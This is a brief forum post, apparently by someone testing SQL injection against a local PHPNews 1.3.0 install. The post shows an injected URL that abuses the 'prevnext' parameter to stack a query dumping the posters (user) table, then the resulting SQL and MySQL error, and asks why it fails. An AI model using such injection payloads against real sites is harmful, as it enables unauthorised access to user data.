So, fuck it ... I'll give you a quick summary of my problem -.-
I'm playing with an SQL injection on my server
this is the URL with the injection
Code: Select all
http://127.0.0.1/phpnews_1-3-0/news.php?catid=1&prevnext=1,8; SELECT * FROM phpnews_posters; --
Code: Select all
SELECT n.id,n.posterid,n.postername,n.time,n.subject,n.titletext,n.maintext,n.catid,n.views,p.username,p.email,p.avatar,c.catname,c.caticon FROM phpnews_news AS n LEFT JOIN phpnews_posters AS p ON(n.posterid=p.id) LEFT JOIN phpnews_categories AS c ON(n.catid=c.id) WHERE n.trusted = 1 ORDER by n.id DESC LIMIT 1,8; SELECT * FROM phpnews_posters; -- , 8
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT * FROM phpnews_posters; -- , 8' at line 1
If I use the SQL from above in the mysql command prompt, it works just fine. What am I doing wrong here?